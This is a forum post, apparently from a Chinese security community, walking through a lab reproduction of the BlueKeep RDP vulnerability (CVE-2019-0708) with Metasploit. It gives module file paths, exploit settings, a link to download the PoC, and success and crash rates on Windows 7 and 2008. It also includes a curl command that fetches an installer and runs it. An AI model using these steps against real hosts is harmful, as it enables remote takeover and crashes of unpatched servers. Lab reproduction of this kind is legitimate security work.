请选择 进入手机版 | 继续访问电脑版
查看: 389|回复: 1

CVE-2019-0708复现过程以及稳定性测试

[复制链接]
  • TA的每日心情

    昨天 19:26
  • 签到天数: 745 天

    [LV.9]以坛为家II

    发表于 2019-9-9 21:13:44 | 显示全部楼层 |阅读模式
    作者:08sec-Dmagic
    准备材料 Windows7 和 windows2008 r2的镜像 poc下载链接: https://pan.baidu.com/s/1TAhulC6IVhcn8OmBOHX4xA 提取码: 3d7d

    目标ip:192.168.3.20 本机ip:192.168.3.24 目标os:windows 7 SP1 X64 本机os:kali 目标RDP端口:3389

    测试过程: 先更新一下 Msf Curl https://raw.githubusercontent.co ... ppers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

    然后将各个文件分别放入
    [AppleScript] 纯文本查看 复制代码
    /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
    /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb


    使用msfconsole进入metasploit-framework

    进入以后使用reload_all重新加载0708rdp利用模块

    使用
    [AppleScript] 纯文本查看 复制代码
    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    启用0708RDP攻击模块

    使用info查看工具相关信息以及设置 可见关键设置主要为
    [AppleScript] 纯文本查看 复制代码
    RHOSTS\ RPORT \ target


    使用set RHOSTS 受害机IP设置受害机IP

    使用set RPORT 受害机PORT设置受害机RDP端口号

    使用set target ID数字(可选为0-4)设置受害机机器架构

    这里我们使用的是VMware Fusion,那么target 3满足条件

    使用run开始攻击,等待建立连接

    然后shell接着python就好了



    稳定性测试:windows7 测试五次全部成功 windows2008 十次全部蓝屏。

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    昨天 14:15
  • 签到天数: 482 天

    [LV.9]以坛为家II

    发表于 昨天 14:16 | 显示全部楼层
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表